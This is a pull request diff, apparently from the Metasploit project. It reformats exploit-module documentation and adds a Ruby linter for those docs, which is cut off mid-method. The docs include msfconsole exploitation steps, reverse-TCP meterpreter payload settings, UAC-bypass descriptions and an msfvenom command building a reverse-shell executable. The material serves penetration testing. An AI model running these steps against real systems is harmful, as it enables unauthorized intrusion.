### PR TITLE
msftidy_docs

### DIFF
--- a/documentation/modules/exploit/multi/postgres/postgres_copy_from_program_cmd_exec.md
+++ b/documentation/modules/exploit/multi/postgres/postgres_copy_from_program_cmd_exec.md
@@ -1,20 +1,20 @@
+## Vulnerable Application
+
 This module attempts to create a new table, then execute system commands in the
 context of copying the command output into the table.
 
 This module should work on all Postgres systems running version 9.3 and above.
 
-## Vulnerable Application
-
-  Download any version of PostgreSQL from 9.3 to 11.2 (Latest at time of writing)
-  Set up the software and connect as the postgres superuser.
-  Use the techniques described in this blogpost to verify command execution:
-    https://medium.com/greenwolf-security/authenticated-arbitrary-command-execution-on-postgresql-9-3-latest-cd18945914d5
+Download any version of PostgreSQL from 9.3 to 11.2 (Latest at time of writing)
+Set up the software and connect as the postgres superuser.
+Use the techniques described in this blogpost to verify command execution:
+  https://medium.com/greenwolf-security/authenticated-arbitrary-command-execution-on-postgresql-9-3-latest-cd18945914d5
 
 ## Verification Steps
 
   You must be able to connect to the PostgreSQL database, and have a valid set of superuser
   credentials, or a user in the 'pg_execute_server_program' group
-  
+
   Exploiting Linux/OSX:
 
     1. Start msfconsole
@@ -27,7 +27,7 @@ This module should work on all Postgres systems running version 9.3 and above.
     8. set LHOST my.ip.add.ress
     9. set LHOST myport
     10. exploit
-  
+
   Exploiting Windows:
 
     1. Start msfconsole
@@ -45,31 +45,30 @@ This module should work on all Postgres systems running version 9.3 and above.
     13. set DATABASE postgres
     14. exploit
 
-
 ## Options
 
   **TABLENAME**
-  
+
   The name of the table to create in the database, default is set to 'msftesttable', this table will be dropped create a new
   one each time the exploit is run.
-  
+
   **DUMP_TABLE_OUTPUT**
 
-  If enabled this option will perform a select statement on the created table before it is deleted. This can be used for 
-  debugging if there are problems with a command being executed. 
-  
+  If enabled this option will perform a select statement on the created table before it is deleted. This can be used for
+  debugging if there are problems with a command being executed.
+
   **DATABASE**
-  
+
   Name of the database to connect to
-  
+
   **USERNAME**
-  
+
   A valid username that allows access to the database
-  
+
   **PASSWORD**
-  
+
   A valid password that allows access to the database
-  
+
 ## Scenarios
 
 ### Exploiting PostgreSQL 11.2 on Linux Ubuntu 18.04
@@ -114,7 +113,7 @@ This module should work on all Postgres systems running version 9.3 and above.
        Id  Name
        --  ----
        0   Automatic
-   
+    
      msf5 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > exploit
 
     [*] Started reverse TCP handler on 192.168.0.18:4456
@@ -133,10 +132,9 @@ This module should work on all Postgres systems running version 9.3 and above.
     Linux ubuntu 4.15.0-45-generic #48-Ubuntu SMP Tue Jan 29 16:28:13 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
     /usr/lib/postgresql/11/bin/postgres -V
     postgres (PostgreSQL) 11.2 (Ubuntu 11.2-1.pgdg18.04+1)
-   
+
 ### Exploiting PostgreSQL 10.7 on Windows 10
 
-    
     msf5 exploit(multi/script/web_delivery) > set target 2
     target => 2
     msf5 exploit(multi/script/web_delivery) > set payload windows/meterpreter/reverse_tcp

--- a/documentation/modules/exploit/windows/fileformat/office_excel_slk.md
+++ b/documentation/modules/exploit/windows/fileformat/office_excel_slk.md
@@ -1,6 +1,6 @@
 ## Introduction
 
-The .slk file format used by Microsoft Excel has the ability to execute local commands via the `EEXEC(cmd)` function. 
+The .slk file format used by Microsoft Excel has the ability to execute local commands via the `EEXEC(cmd)` function.
 This module takes advantage of this 'feature' to run a download-and-execute powershell command in order to spawn a session
 on the target.
 
@@ -43,7 +43,7 @@ on the target.
   [*] Using URL: http://192.168.146.1:8080/default.hta
   [*] Server started.
   ```
-  
+
   Once the victim opens the file and clicks 'Enable Content' a session should spawn:
 
   ```

--- a/documentation/modules/exploit/windows/http/disk_pulse_enterprise_get.md
+++ b/documentation/modules/exploit/windows/http/disk_pulse_enterprise_get.md
@@ -1,9 +1,9 @@
 ## Vulnerable Application
 
   Tested on Windows 7 x64 and x86.
-  
+
   Install the application from the link below and enable the web server by going to Options -> Server -> Enable Web Server on Port.
-  
+
   [Disk Pulse Enterprise v 9.9.16](https://www.exploit-db.com/apps/45ce22525c87c0762f6e467db6ddfcbc-diskpulseent_setup_v9.9.16.exe)
 
 ## Verification Steps
@@ -20,9 +20,9 @@
   **RHOST**
 
   IP address of the remote host running the server.
-  
+
   **RPORT**
-  
+
   Port that the web server is running on.  Default is 80 but it can be changed when setting up the program or in the options.
 
 ## Scenarios

--- a/documentation/modules/exploit/windows/http/geutebrueck_gcore_x64_rce_bo.md
+++ b/documentation/modules/exploit/windows/http/geutebrueck_gcore_x64_rce_bo.md
@@ -1,6 +1,6 @@
 ## Vulnerable Application
 
-  Geutebrück GCore Server 1.3.8.42, 1.4.2.37 are vulnerable to a buffer overflow exploitation. 
+  Geutebrück GCore Server 1.3.8.42, 1.4.2.37 are vulnerable to a buffer overflow exploitation.
   Since this application is started with system privileges this allows a system remote code execution.
 
 ## Verification Steps

--- a/documentation/modules/exploit/windows/http/hp_imc_java_deserialize.md
+++ b/documentation/modules/exploit/windows/http/hp_imc_java_deserialize.md
@@ -1,9 +1,8 @@
-The module exploits a RCE bug on vulnerable installations of Hewlett Packard Enterprise Intelligent Management Center. Authentication is not required.
-
-The specific flaw exists within the `WebDMDebugServlet`, which listens on TCP ports `8080` and `8443` by default. The issue results from the lack of proper validation of user-supplied data, which can result in deserialization of untrusted data. An attacker can leverage this vulnerability to execute arbitrary code in the context of SYSTEM.
-
-
 ## Vulnerable Application
+
+  The module exploits a RCE bug on vulnerable installations of Hewlett Packard Enterprise Intelligent Management Center. Authentication is not required.
+
+  The specific flaw exists within the `WebDMDebugServlet`, which listens on TCP ports `8080` and `8443` by default. The issue results from the lack of proper validation of user-supplied data, which can result in deserialization of untrusted data. An attacker can leverage this vulnerability to execute arbitrary code in the context of SYSTEM.
 
   On a Windows machine, download and install a trial version of HPE IMC from here:
 
@@ -21,7 +20,7 @@ The specific flaw exists within the `WebDMDebugServlet`, which listens on TCP po
   2. Start msfconsole
   3. Do: ```use exploit/windows/http/hp_imc_java_deserialize```
   4. Do: ```set RHOSTS <RHOSTS>```
-  5. Do: ```set PAYLOAD windows/meterpreter/reverse_tcp``` 
+  5. Do: ```set PAYLOAD windows/meterpreter/reverse_tcp```
   6. Do: ```set LHOST <LHOST>```
   7. Do: ```check```
   8. **Verify** that you are seeing `The target is vulnerable.` in console.

--- a/documentation/modules/exploit/windows/http/manageengine_connectionid_write.md
+++ b/documentation/modules/exploit/windows/http/manageengine_connectionid_write.md
@@ -1,18 +1,20 @@
-## Description
+## Vulnerable Application
+
+### Description
 
 This module exploits a vulnerability found in ManageEngine Desktop Central 9. When uploading a 7z file, the FileUploadServlet class does not check the user-controlled ConnectionId parameter in the FileUploadServlet class. This allows a remote attacker to inject a null byte at the end of the value to create a malicious file with an arbitrary file type, and then place it under a directory that allows server-side scripts to run, which results in remote code execution under the context of SYSTEM.
 This exploit was successfully tested on version 9, build 90109 and build 91084.
 
 **NOTE:** By default, some ManageEngine Desktop Central versions run on port 8020, but older ones run on port 8040. Also, using this exploit will leave debugging information produced by FileUploadServlet in file `rdslog0.txt`.
        
-## ManageEngine Desktop Central 9
+### ManageEngine Desktop Central 9
 
 Desktop Central is integrated desktop and mobile device management software that helps in managing servers, laptops, desktops, smartphones, and tablets from a central location. It is used for automating your regular desktop management routines like installing patches, distributing software, managing your IT Assets, managing software licenses, monitoring software usage statistics, managing USB device usage, taking control of remote desktops, and more. It supports managing both Windows, Mac and Linux operating systems.
 
-## Prerequisites
+### Prerequisites
 
 1. Start a Windows VM (such as Win 7)
-2. Install a vulnerable version of ManageEngine Desktop Central. This exploit was tested on Build [90109](http://archives.manageengine.com/desktop-central/90109/) and [91084](http://archives.manageengine.com/desktop-central/91084/). 
+2. Install a vulnerable version of ManageEngine Desktop Central. This exploit was tested on Build [90109](http://archives.manageengine.com/desktop-central/90109/) and [91084](http://archives.manageengine.com/desktop-central/91084/).
 3. After installation, verify that the server is working by visiting it with a browser. Depending on the version, the server port may be 8020, or 8040.
 
 ## Verification Steps

--- a/documentation/modules/exploit/windows/http/octopusdeploy_deploy.md
+++ b/documentation/modules/exploit/windows/http/octopusdeploy_deploy.md
@@ -1,9 +1,9 @@
 ## Vulnerable Application
 
   [Install Octopus Deploy server](https://octopus.com/docs/getting-started#Gettingstarted-InstalltheOctopusserver)
-  
+
   [Create a test user/team](https://octopus.com/docs/administration/managing-users-and-teams) - Team should have "Project contributor" and "Project deployer", or just "System administrator" and add your test user.
-  
+
   [Create an API key](https://octopus.com/docs/how-to/how-to-create-an-api-key)
 
 ## Verification Steps
@@ -42,6 +42,7 @@
   **SSL**
 
   Enables or disables SSL. Octopus Deploy server can be configured to listen for HTTP or HTTPS traffic.
+
 ## Scenarios
 
 ### Octopus Deploy Server 3.16.0

--- a/documentation/modules/exploit/windows/ibm/ibm_was_dmgr_java_deserialization_rce.md
+++ b/documentation/modules/exploit/windows/ibm/ibm_was_dmgr_java_deserialization_rce.md
@@ -1,13 +1,13 @@
-## Description
-This module exploits the lack of proper authentication checks in IBM Websphere Application Server ND that allows for the execution of an arbitrary command and upload of an arbitrary file as SYSTEM. The module serializes the required Java objects expected by the IBM Websphere server.
-
-The vulnerability was identified by @rwincey (b0yd) of [Securifera](https://www.securifera.com/) and was assigned [CVE-2019-4279](https://www-01.ibm.com/support/docview.wss?uid=ibm10883628).
-
-
 ## Vulnerable Application
-The module affects [IBM Websphere Application Server Network Deployment](https://www.ibm.com/support/knowledgecenter/en/SSAW57/mapfiles/product_welcome_wasnd.html). The agent is installed on servers with the network deployment feature and listens on TCP port 11002,11004, or 11006. The vulnerability affects versions up to 9.0.0.11.
+
+This module exploits the lack of proper authentication checks in IBM Websphere Application Server ND that allows for the execution of an
+arbitrary command and upload of an arbitrary file as SYSTEM. The module serializes the required Java objects expected by the IBM Websphere server.
+
+The module affects [IBM Websphere Application Server Network Deployment](https://www.ibm.com/support/knowledgecenter/en/SSAW57/mapfiles/product_welcome_wasnd.html).
+The agent is installed on servers with the network deployment feature and listens on TCP port 11002,11004, or 11006. The vulnerability affects versions up to 9.0.0.11.
 
 ## Verification Steps
+
 To use this exploit you will need access to IBM Websphere Application Server Network Deployment.
 
 1. Install the IBM Websphere Application Server Network Deployment on a host.
@@ -21,10 +21,12 @@ To use this exploit you will need access to IBM Websphere Application Server Net
 The result should be that calc.exe is executed on the target machine.
 
 ## Scenarios
+
 The exploit module contains several targets as detailed below.
 
 ### Target 0: Windows Powershell Injected Shellcode
-This module target provides support for command staging to enable arbitrary Metasploit payloads to be used against Windows targets (for example, a Meterpreter shell). 
+
+This module target provides support for command staging to enable arbitrary Metasploit payloads to be used against Windows targets (for example, a Meterpreter shell).
 
 ```
 msf5 > use exploit/windows/ibm/ibm_was_dmgr_java_deserialization_rce

--- a/documentation/modules/exploit/windows/iis/iis_webdav_upload_asp.md
+++ b/documentation/modules/exploit/windows/iis/iis_webdav_upload_asp.md
@@ -1,6 +1,6 @@
-## Description
+## Vulnerable Application
 
-This module can be used to execute a payload on IIS servers that have world-writeable directories. The payload is uploaded as an ASP script via a WebDAV PUT request. 
+This module can be used to execute a payload on IIS servers that have world-writeable directories. The payload is uploaded as an ASP script via a WebDAV PUT request.
 
 **IMPORTANT:** The target IIS machine must meet these conditions to be considered as exploitable:
 
@@ -8,7 +8,7 @@ This module can be used to execute a payload on IIS servers that have world-writ
 2. It allows Read and Write permission.
 3. It supports ASP.
 
-## WebDAV
+### WebDAV
 
 Web Distributed Authoring and Versioning (WebDAV) is an extension of the Hypertext Transfer Protocol (HTTP) that allows clients to perform remote Web content authoring operations. WebDAV is defined in RFC 4918 by a working group of the Internet Engineering Task Force.
 
@@ -16,10 +16,10 @@ Web Distributed Authoring and Versioning (WebDAV) is an extension of the Hyperte
 
 1. Do: ```use exploit/windows/iis/iis_webdav_upload_asp```
 2. Do: ```set payload windows/meterpreter/reverse_tcp```
-2. Do: ```set LHOST [IP]```
-3. Do: ```set RHOST [IP]```
-3. Do: ```set PATH / [PATH]```
-4. Do: ```run```
+3. Do: ```set LHOST [IP]```
+4. Do: ```set RHOST [IP]```
+5. Do: ```set PATH / [PATH]```
+6. Do: ```run```
 
 ## Scenarios
 

--- a/documentation/modules/exploit/windows/local/bypassuac_fodhelper.md
+++ b/documentation/modules/exploit/windows/local/bypassuac_fodhelper.md
@@ -1,4 +1,6 @@
-## Introduction
+## Vulnerable Application
+
+### Introduction
 
   This module will bypass Windows 10 UAC by hijacking a special key in the Registry under
   the current user hive, and inserting a custom command that will get invoked when
@@ -14,12 +16,11 @@
 
 ## Usage
 
-  You'll first need to obtain a session on the target system.  
+  You'll first need to obtain a session on the target system.
   Next, once the module is loaded, one simply needs to set the ```payload``` and ```session``` options.
   The module use an hardcoded timeout of 5 seconds during which it expects fodhelper.exe to be launched on the target system.
   On slower system this may be too short, resulting in no session being created. In this case disable the automatic payload handler (`set DISABLEPAYLOADHANDLER true`)
   and manually create a job handler corresponding to the payload.
-  
 
 ## Scenarios
 

--- a/documentation/modules/exploit/windows/local/bypassuac_silentcleanup.md
+++ b/documentation/modules/exploit/windows/local/bypassuac_silentcleanup.md
@@ -1,10 +1,10 @@
 ## Introduction
 
-This module will bypass UAC on any Windows installation with Powershell installed. 
+This module will bypass UAC on any Windows installation with Powershell installed.
 
 There's a task in Windows Task Scheduler called "SilentCleanup" which, while it's executed as Users, automatically runs with elevated privileges.
 When it runs, it executes the file %windir%\system32\cleanmgr.exe. Since it runs as Users, and we can control user's environment variables,
-%windir% (normally pointing to C:\Windows) can be changed to point to whatever we want, and it'll run as admin. In order to work, the code must 
+%windir% (normally pointing to C:\Windows) can be changed to point to whatever we want, and it'll run as admin. In order to work, the code must
 be saved in a script file somewhere, it cannot be run directly from powershell or from the run dialog.
 
 ## Usage

--- a/documentation/modules/exploit/windows/local/bypassuac_sluihijack.md
+++ b/documentation/modules/exploit/windows/local/bypassuac_sluihijack.md
@@ -9,13 +9,13 @@
 
   The module modifies the registry in order for this exploit to work. The modification is
   reverted once the exploitation attempt has finished.
-	
+
   The module does not require the architecture of the payload to match the OS. If
   specifying EXE::Custom your DLL should call ExitProcess() after starting the
   payload in a different process.
 
 ## Usage
-	
+
   1. First we need to obtain a session on the target system.
   2. Load module: `use exploit/windows/local/bypassuac_sluihijack`
   3. Set the `payload`: `set payload windows/x64/meterpreter/reverse_tcp`

--- a/documentation/modules/exploit/windows/local/bypassuac_windows_store_reg.md
+++ b/documentation/modules/exploit/windows/local/bypassuac_windows_store_reg.md
@@ -5,7 +5,7 @@ is run with the "autoElevate" property set to true, and it will automatically
 launch a file from a low-privilege registry location with elevated privileges.
 To bypass, simply place the binary on disk, write its location in the
 correct registry key, and run WSReset.exe.  The binary will be run with elevated
-privileges. 
+privileges.
 
 ## Usage
 

--- a/documentation/modules/exploit/windows/local/ms16_075_reflection.md
+++ b/documentation/modules/exploit/windows/local/ms16_075_reflection.md
@@ -1,34 +1,38 @@
 ## Introduction
-  This module will abuse the SeImperonsate privilege commonly found in 
-services due to the requirement to impersonate a client upon 
-authentication. As such it is possible to impersonate the SYSTEM account 
-and relay its NTLM hash to RPC via DCOM. The DLL will perform a MiTM 
-attack at which intercepts the hash and relay responses from RPC to be 
-able to establish a handle to a new SYSTEM token. Some caveats : Set 
-your target option to match the architecture of your Meterpreter 
-session, else it will inject the wrong architecture DLL into the process 
-of a seperate architecture. Additionally, after you have established a 
+
+  This module will abuse the SeImperonsate privilege commonly found in
+services due to the requirement to impersonate a client upon
+authentication. As such it is possible to impersonate the SYSTEM account
+and relay its NTLM hash to RPC via DCOM. The DLL will perform a MiTM
+attack at which intercepts the hash and relay responses from RPC to be
+able to establish a handle to a new SYSTEM token. Some caveats : Set
+your target option to match the architecture of your Meterpreter
+session, else it will inject the wrong architecture DLL into the process
+of a seperate architecture. Additionally, after you have established a
 session, you must use incognito to imperonsate the SYSTEM Token.
 
 ## Build Instructions
+
 This builds using visual studio 2017 and tools v141.  Attempts
 to compile with previous verstions of build tools will succeed but
 the resulting binary fails to exploit the vulnerability.
 
 ## Usage
+
   You'll first need to obtain a session on the target system.
-  Next, once the module is loaded, one simply needs to set the 
+  Next, once the module is loaded, one simply needs to set the
 ```payload``` and ```session``` options, in addition to architecture.
-  
-  Your user at which you are trying to exploit must have `SeImpersonate` 
+
+  Your user at which you are trying to exploit must have `SeImpersonate`
 privileges.
-  
-  The module has a hardcoded timeout of 20 seconds, as the attack may 
-not work immediately and take a few seconds to start. Also, check to 
-make sure port 6666 is inherently not in use else the exploit will not 
-run properly
-  
+
+  The module has a hardcoded timeout of 20 seconds, as the attack may
+not work immediately and take a few seconds to start. Also, check to
+make sure port 6666 is inherently not in use else the exploit will not
+run properly.
+
 ## Scenarios
+
 ```
   Name Current Setting Required Description
    ---- --------------- -------- -----------

--- a/documentation/modules/exploit/windows/local/ms16_reflection.md
+++ b/documentation/modules/exploit/windows/local/ms16_reflection.md
@@ -1,27 +1,30 @@
 ## Introduction
-  This module will abuse the SeImperonsate privilege commonly found in 
-services due to the requirement to impersonate a client upon 
-authentication. As such it is possible to impersonate the SYSTEM account 
-and relay its NTLM hash to RPC via DCOM. The DLL will perform a MiTM 
-attack at which intercepts the hash and relay responses from RPC to be 
-able to establish a handle to a new SYSTEM token. Some caveats : Set 
-your target option to match the architecture of your Meterpreter 
-session, else it will inject the wrong architecture DLL into the process 
-of a seperate architecture. Additionally, after you have established a 
+
+  This module will abuse the SeImperonsate privilege commonly found in
+services due to the requirement to impersonate a client upon
+authentication. As such it is possible to impersonate the SYSTEM account
+and relay its NTLM hash to RPC via DCOM. The DLL will perform a MiTM
+attack at which intercepts the hash and relay responses from RPC to be
+able to establish a handle to a new SYSTEM token. Some caveats : Set
+your target option to match the architecture of your Meterpreter
+session, else it will inject the wrong architecture DLL into the process
+of a seperate architecture. Additionally, after you have established a
 session, you must use incognito to imperonsate the SYSTEM Token.
+
 ## Usage
+
   You'll first need to obtain a session on the target system.
-  Next, once the module is loaded, one simply needs to set the 
+  Next, once the module is loaded, one simply needs to set the
 ```payload``` and ```session``` options, in addition to architecture.
-  
-  Your user at which you are trying to exploit must have `SeImpersonate` 
+
+  Your user at which you are trying to exploit must have `SeImpersonate`
 privileges.
-  
-  The module has a hardcoded timeout of 20 seconds, as the attack may 
-not work immediately and take a few seconds to start. Also, check to 
-make sure port 6666 is inherently not in use else the exploit will not 
+
+  The module has a hardcoded timeout of 20 seconds, as the attack may
+not work immediately and take a few seconds to start. Also, check to
+make sure port 6666 is inherently not in use else the exploit will not
 run properly
-  
+
 ## Scenarios
 ```
   Name Current Setting Required Description

--- a/documentation/modules/exploit/windows/local/panda_psevents.md
+++ b/documentation/modules/exploit/windows/local/panda_psevents.md
@@ -1,8 +1,10 @@
 ## Vulnerable Application
 
-  Panda Antivirus Pro 2016 16.1.2 is available from [filehippo](http://filehippo.com/download_panda_antivirus_pro_2017/download/b436969174c5ca07a27a0aedf6456c89/) or from an unofficial [git](https://github.com/h00die/MSF-Testing-Scripts/blob/master/Panda_AV_Pro2016_16.1.2.exe).
+  Panda Antivirus Pro 2016 16.1.2 is available from [filehippo](http://filehippo.com/download_panda_antivirus_pro_2017/download/b436969174c5ca07a27a0aedf6456c89/)
+  or from an unofficial [git](https://github.com/h00die/MSF-Testing-Scripts/blob/master/Panda_AV_Pro2016_16.1.2.exe).
 
-  The AV must be running for PSEvents.exe to run and the module to get called, which can take up to an hour.  I 32bit meterpreter seems to get caught, so you may need an AV exclusion for the folder to ensure it didn't catch meterpreter in action.
+  The AV must be running for PSEvents.exe to run and the module to get called, which can take up to an hour.  I 32bit meterpreter seems to get caught,
+  so you may need an AV exclusion for the folder to ensure it didn't catch meterpreter in action.
 
   The downloads folder can take a 10-15 minutes to appear after install, and its downloaded by Panda AV from the company.
 
@@ -10,8 +12,6 @@
   2. Then right after HTTP GET request to 23.215.132.154 for /retail/psevents_suite.exe.
 
 ## Verification Steps
-
-  Example steps in this format:
 
   1. Install the application
   2. Wait for `C:\ProgramData\Panda Security\Panda Devices Agent\Downloads` folder to appear
@@ -28,7 +28,7 @@
   **DLL**
 
   Which DLL to name our payload.  The original vulnerability writeup utilized bcryptPrimitives.dll, and mentioned several others that could be used.  However the dll seems to be VERY picky.  Default is cryptnet.dll.  See the chart for more details.
-  
+
 |                                           | WINHTTP.dll | VERSION.dll | bcryptPrimitives.dll | CRYPTBASE.dll | cryptnet.dll | WININET.dll |
 |---------------------------------------------------------------|-------------|-------------|----------------------|---------------|--------------|-------------|
 | 64bit target (1), win10 x64 | CRASH | CRASH | NO |  NO       | valid     |    no |
@@ -38,9 +38,9 @@
 | 32bit target (0), win7sp1 x86 |  |  | valid |       | valid (caught by av)     |     |
 
 In this chart, `CRASH` means PSEvents.exe crashed on the system.  `NO` means PSEvents didn't crash, but no session was obtained.  `valid` means we got a shell.
-  
+
   **ListenerTimeout**
-  
+
   How long to wait for a shell.  PSEvents.exe runs every hour or so, so the default is 3610 (10sec to account for code execution or other things)
 
 ## Scenarios
@@ -48,7 +48,7 @@ In this chart, `CRASH` means PSEvents.exe crashed on the system.  `NO` means PSE
 ### Windows 8.1 x86 with Panda Antirivus Pro 2016 16.1.2
 
   Step 1, get a local shell.  I used msfvenom to drop an exe for easy user level meterpreter.
-  
+
     msfvenom -a x86 --platform windows -p windows/meterpreter_reverse_tcp -f exe -o meterpreter.exe -e x86/shikata_ga_nai -i 1 LHOST=192.168.2.117 LPORT=4449
     
     msf > use exploit/multi/handler 

--- a/documentation/modules/exploit/windows/misc/ahsay_backup_fileupload.md
+++ b/documentation/modules/exploit/windows/misc/ahsay_backup_fileupload.md
@@ -1,14 +1,15 @@
 ## Vulnerable Application
+
   Ahsay Backup v7.x - v8.1.1.50
   Download the vulnerable version: `http://ahsay-dn.ahsay.com/v8/81150/cbs-win.exe`
   Start the application ( I start it manually from `C:\Program Files\AhsayCBS\bin\startup.bat`)
-  
+
 ## Verification Steps
 
   1. Start `msfconsole`
   2. `use exploit/windows/misc/ahsay_fileupload`
   3. enable create trial account `set CREATEACCOUNT true`
-  4. set RHOST `set RHOST 172.16.238.175` 
+  4. set RHOST `set RHOST 172.16.238.175`
   5. set LHOST `set LHOST 172.16.238.235`
   6. run exploit `run`
   7. We should receive a meterpreter shell.
@@ -22,12 +23,10 @@
    TARGETURI      - Path to Ahsay installation
    UPLOADPATH     - Path to where the file should be uploaded
    USERNAME       - Username to Ahsay account, if CREATEACCOUNT is set this username will be used.
-   
+
 ## Scenarios
 
-### Version of software and OS as applicable
-
-This exploit has been tested on Windows 2003 SP2.
+### Ahsay 8.1.1.50 on Windows 2003 SP2
 
   ```
 msf exploit(windows/misc/ahsay_fileupload) > set CREATEACCOUNT true

--- a/documentation/modules/exploit/windows/misc/ais_esel_server_rce.md
+++ b/documentation/modules/exploit/windows/misc/ais_esel_server_rce.md
@@ -38,17 +38,16 @@
   6. `run`
   7. **Verify** Session opened
 
-
 ## Scenarios
 
-    msf5 > use exploit/windows/misc/ais_esel_server_rce 
+    msf5 > use exploit/windows/misc/ais_esel_server_rce
     msf5 exploit(windows/misc/ais_esel_server_rce) > set rhosts 10.66.75.212
     rhosts => 10.66.75.212
           msf5 exploit(windows/misc/ais_esel_server_rce) > check
           [+] 10.66.75.212:5099 - The target is vulnerable.
     msf5 exploit(windows/misc/ais_esel_server_rce) > run
 
-    [*] Started reverse TCP handler on 10.66.75.208:4444 
+    [*] Started reverse TCP handler on 10.66.75.208:4444
     [+] 10.66.75.212:5099 - Correct response received => Data send succesfully
     [+] 10.66.75.212:5099 - Correct response received => Data send succesfully
     [*] 10.66.75.212:5099 - Command Stager progress -   1.47% done (1499/102292 bytes)

--- a/documentation/modules/exploit/windows/misc/gh0st.md
+++ b/documentation/modules/exploit/windows/misc/gh0st.md
@@ -2,7 +2,7 @@
 
   This module exploits a buffer overflow in the Gh0st Controller when handling a drive list as received by a victim.
   This vulnerability can allow remote code execution in the context of the user who ran it.
-  
+
   A vulnerable version of the software is available here: [gh0st 3.6](https://github.com/rapid7/metasploit-framework/files/1243297/0efd83a87d2f5359fae051517fdf4eed8972883507fbd3b5145c3757f085d14c.zip)
 
 ## Verification Steps
@@ -17,7 +17,7 @@
 ## Options
 
   **MAGIC**
-  
+
   This is the 5 character magic used by the server.  The default is `Gh0st`
 
 ## Scenarios

--- a/documentation/modules/exploit/windows/misc/hp_loadrunner_magentproc_cmdexec.md
+++ b/documentation/modules/exploit/windows/misc/hp_loadrunner_magentproc_cmdexec.md
@@ -1,14 +1,14 @@
+## Vulnerable Application
+
 HP Mercury LoadRunner Agent magentproc.exe Remote Command Execution (CVE-2010-1549)
 
-This module exploits a remote command execution vulnerablity in HP LoadRunner before 9.50 and also 
-HP Performance Center before 9.50. By sending a specially crafted packet, an attacker can execute commands remotely. 
+This module exploits a remote command execution vulnerablity in HP LoadRunner before 9.50 and also
+HP Performance Center before 9.50. By sending a specially crafted packet, an attacker can execute commands remotely.
 The service is vulnerable provided the Secure Channel feature is disabled (default).
 
 During testing, additional versions were verified to be vulnerable.  The following list documents them:
 
  - HP LoadRunner 12.53 Community Edition (non-default SSL turned off)
-
-## Vulnerable Application
 
 HP LoadRunner 9.50 or below, or a version documented above.
 

--- a/documentation/modules/exploit/windows/misc/plugx.md
+++ b/documentation/modules/exploit/windows/misc/plugx.md
@@ -2,7 +2,7 @@
 
   This module exploits a stack overflow in the Plug-X Controller when handling a larger than expected message.
   This vulnerability can allow remote code execution however it causes a popup message to be displayed on the target before execution is gained.
-  
+
   A vulnerable version of the software is available here: [PlugX type 1](https://github.com/rapid7/metasploit-framework/files/1243293/9f59a606c57217d98a5eea6846c8113aca07b203e0dcf17877b34a8b2308ade6.zip)
 
 ## Verification Steps

--- a/documentation/modules/exploit/windows/smb/group_policy_startup.md
+++ b/documentation/modules/exploit/windows/smb/group_policy_startup.md
@@ -29,7 +29,6 @@ More information available at [Gotham Digital Science Security](https://blog.gds
 
   Share name (Default: Random)
 
-
 ## Scenarios
 
 ### Domain Group Policy
@@ -41,7 +40,7 @@ In this scenario, the following computers are present:
 
 The module sets up the SMB share and VBScript file. Out of band (outside the scope of this module or docs) a Group Policy is simply applied to the `OU` computer container.
 Next, the Win 7 box grabs the payload, in this case the meterpreter reverse_tcp stager on boot, with `SYSTEM` privs because its executed as a start up script.
-Theoretically, any computer in that `OU` would also execute the script on started up. 
+Theoretically, any computer in that `OU` would also execute the script on started up.
 
   ```
   msf > use modules/exploits/windows/smb/group_policy_startup

--- a/documentation/modules/exploit/windows/winrm/winrm_script_exec.md
+++ b/documentation/modules/exploit/windows/winrm/winrm_script_exec.md
@@ -1,9 +1,9 @@
 ## Vulnerable Application
 
-WinRM, is a Windows-native built-in remote management protocol in its simplest form that uses Simple Object Access Protocol to interface with remote computers and servers, as well as Operating Systems and applications. It handles remote connections by means of the WS-Management Protocol, which is based on SOAP (Simple Object Access Protocol). 
+WinRM, is a Windows-native built-in remote management protocol in its simplest form that uses Simple Object Access Protocol to interface with remote computers and servers, as well as Operating Systems and applications. It handles remote connections by means of the WS-Management Protocol, which is based on SOAP (Simple Object Access Protocol).
 This module uses valid credentials to login to the WinRM service and execute a payload. It has two available methods for payload delivery: Powershell 2.0 and VBS CmdStager. This module will check if Poweshell 2.0 is available, and if so then it will use that method. Otherwise it falls back to the VBS CmdStager which is less stealthy.
 
-**IMPORTANT:** If targetting an x64 system with the Poweshell method, one must select an x64 payload. An x86 payload will never return. 
+**IMPORTANT:** If targetting an x64 system with the Poweshell method, one must select an x64 payload. An x86 payload will never return.
 
 ## Example Usage
 

--- a/tools/dev/msftidy_docs.rb
+++ b/tools/dev/msftidy_docs.rb
@@ -1,0 +1,287 @@
+#!/usr/bin/env ruby
+# -*- coding: binary -*-
+
+#
+# Check (recursively) for style compliance violations and other
+# tree inconsistencies.
+#
+# by h00die
+#
+
+require 'fileutils'
+require 'find'
+require 'time'
+
+class String
+  def red
+    "\e[1;31;40m#{self}\e[0m"
+  end
+
+  def yellow
+    "\e[1;33;40m#{self}\e[0m"
+  end
+
+  def green
+    "\e[1;32;40m#{self}\e[0m"
+  end
+
+  def cyan
+    "\e[1;36;40m#{self}\e[0m"
+  end
+end
+
+class MsftidyDoc
+
+  # Status codes
+  OK       = 0
+  WARNING  = 1
+  ERROR    = 2
+
+  # Some compiles regexes
+  REGEX_MSF_EXPLOIT = / \< Msf::Exploit/
+  REGEX_IS_BLANK_OR_END = /^\s*end\s*$/
+
+  attr_reader :full_filepath, :source, :stat, :name, :status
+
+  def initialize(source_file)
+    @full_filepath = source_file
+    @module_type = File.dirname(File.expand_path(@full_filepath))[/\/modules\/([^\/]+)/, 1]
+    @source  = load_file(source_file)
+    @lines   = @source.lines # returns an enumerator
+    @status  = OK
+    @name    = File.basename(source_file)
+  end
+
+  public
+
+  #
+  # Display a warning message, given some text and a number. Warnings
+  # are usually style issues that may be okay for people who aren't core
+  # Framework developers.
+  #
+  # @return status [Integer] Returns WARNINGS unless we already have an
+  # error.
+  def warn(txt, line=0) line_msg = (line>0) ? ":#{line}" : ''
+    puts "#{@full_filepath}#{line_msg} - [#{'WARNING'.yellow}] #{cleanup_text(txt)}"
+    @status = WARNING if @status < WARNING
+  end
+
+  #
+  # Display an error message, given some text and a number. Errors
+  # can break things or are so egregiously bad, style-wise, that they
+  # really ought to be fixed.
+  #
+  # @return status [Integer] Returns ERRORS
+  def error(txt, line=0)
+    line_msg = (line>0) ? ":#{line}" : ''
+    puts "#{@full_filepath}#{line_msg} - [#{'ERROR'.red}] #{cleanup_text(txt)}"
+    @status = ERROR if @status < ERROR
+  end
+
+  # Currently unused, but some day msftidy will fix errors for you.
+  def fixed(txt, line=0)
+    line_msg = (line>0) ? ":#{line}" : ''
